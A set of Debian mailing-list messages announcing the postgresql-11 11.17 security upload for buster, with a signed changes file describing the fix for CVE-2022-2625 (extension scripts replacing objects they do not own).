Re: postgresql-11 11.17-0+deb10u1
Hi Christoph, On 11/08/2022 14:10, Christoph Berg wrote: Hi, I just uploaded postgresql-11, if anyone wants to do the LTS paperwork for that: postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium * New upstream version. + Do not let extension scripts replace objects not already belonging to the extension (Tom Lane) (CVE-2022-2625) This change prevents extension scripts from doing CREATE OR REPLACE if there is an existing object that does not belong to the extension. It also prevents CREATE IF NOT EXISTS in the same situation. This prevents a form of trojan-horse attack in which a hostile database user could become the owner of an extension object and then modify it to compromise future uses of the object by other users. As a side benefit, it also reduces the risk of accidentally replacing objects one did not mean to. The PostgreSQL Project thanks Sven Klemm for reporting this problem. -- Christoph Berg Thu, 11 Aug 2022 14:03:50 +0200 Thanks for the update. I have just sent out the announcement. Cheers, Emilio
Accepted postgresql-11 11.17-0+deb10u1 (source) into oldstable
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Thu, 11 Aug 2022 14:03:50 +0200 Source: postgresql-11 Architecture: source Version: 11.17-0+deb10u1 Distribution: buster-security Urgency: medium Maintainer: Debian PostgreSQL Maintainers Changed-By: Christoph Berg Changes: postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium . * New upstream version. . + Do not let extension scripts replace objects not already belonging to the extension (Tom Lane) (CVE-2022-2625) . This change prevents extension scripts from doing CREATE OR REPLACE if there is an existing object that does not belong to the extension. It also prevents CREATE IF NOT EXISTS in the same situation. This prevents a form of trojan-horse attack in which a hostile database user could become the owner of an extension object and then modify it to compromise future uses of the object by other users. As a side benefit, it also reduces the risk of accidentally replacing objects one did not mean to. . The PostgreSQL Project thanks Sven Klemm for reporting this problem. Checksums-Sha1: 3d880e497eca4196052f740963b3741479ff51a7 3745 postgresql-11_11.17-0+deb10u1.dsc 553aff97123c8b48909ab8b49da2e2f141702d7e 20385599 postgresql-11_11.17.orig.tar.bz2 4007541edd871dcfadd8bead6f97bfe88fd92ad5 28484 postgresql-11_11.17-0+deb10u1.debian.tar.xz Checksums-Sha256: 49d55b7a6e529bf4f7c14c114af2429af8fb1d7656481300e39e892c1668a100 3745 postgresql-11_11.17-0+deb10u1.dsc 6e984963ae0765e61577995103a7e6594db0f0bd01528ac123e0de4a6a4cb4c4 20385599 postgresql-11_11.17.orig.tar.bz2 2e21624784f0991aa3e1b0bd09861848a637a7311938634c70bc8f6743e9fad3 28484 postgresql-11_11.17-0+deb10u1.debian.tar.xz Files: ded96875b9d955ebfdd6386989fee783 3745 database optional postgresql-11_11.17-0+deb10u1.dsc 34d2faf0efe356f4d881cea17607479c 20385599 database optional postgresql-11_11.17.orig.tar.bz2 4be3c5516108a5b8ae2e1b60b2ef1235 28484 database optional postgresql-11_11.17-0+deb10u1.debian.tar.xz -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEXEj+YVf0kXlZcIfGTFprqxLSp64FAmL08RMACgkQTFprqxLS p674vA/8Do9me04eC60khdhek5IrHoe3Z7/nq8bRV1CPzDAtOxIrDscbeWL964OJ Y1ftBgg6EcBSSCmrDAsoqUpiEL9Eq8edcoAFF8NK1FLUFw5dhOocj9Vcyi2B2G5u jdOWfSyGndFERPPhl/5PnodBtJMGstpKmG/2LIRMQq13l1P85/jIkBod324N7yx9 aF1MQ0EYJqi/sDq+o5lnwFJzIowJCUtc1CFjkxO5Ekim5UTzaBK76xbG/c2QJrmM Tm1IK978oRXzt39Q9K9NgnwFF8OiiMaqHPy1oGrO+3JEp8EJchMhibNoTIHJl+hR +Q0azo67dgy0zelGH5Nl013RK8jQS44k/6PBB5PjLAe83GYjJB0rJLNcIS7KYVa+ lGhdSMtiCLSyQ12zmPY0Wo/TueTEu+0TP75LCAi/cf85afj5cVeg8h2h4VtogMn0 CObqmp5gRQgSYDA4tYc0Uh5d013c6CiWUYCPqTP/EvhXlneAYSkhKrhaVhpQ4ur4 GdOyTDV6lMa9Jd5FQjkIrhwZ+RHKPf/M/bODI+yYx42JgC/9bO8P3MwxV7J59FWa gACM3zJtrVuROL3gDILTmGp5dJ4lhqdaqSKiPhXoIcoVgZUR1BtjZhABAR7Z9Nv1 2IYQ9D5clBz6kXcmsFhV9ZeQMY3IXOj7PE++F4vIh4GNDUkB5FQ= =9HvI -END PGP SIGNATURE-
postgresql-11 11.17-0+deb10u1
Hi, I just uploaded postgresql-11, if anyone wants to do the LTS paperwork for that: postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium * New upstream version. + Do not let extension scripts replace objects not already belonging to the extension (Tom Lane) (CVE-2022-2625) This change prevents extension scripts from doing CREATE OR REPLACE if there is an existing object that does not belong to the extension. It also prevents CREATE IF NOT EXISTS in the same situation. This prevents a form of trojan-horse attack in which a hostile database user could become the owner of an extension object and then modify it to compromise future uses of the object by other users. As a side benefit, it also reduces the risk of accidentally replacing objects one did not mean to. The PostgreSQL Project thanks Sven Klemm for reporting this problem. -- Christoph Berg Thu, 11 Aug 2022 14:03:50 +0200 Thanks, Christoph
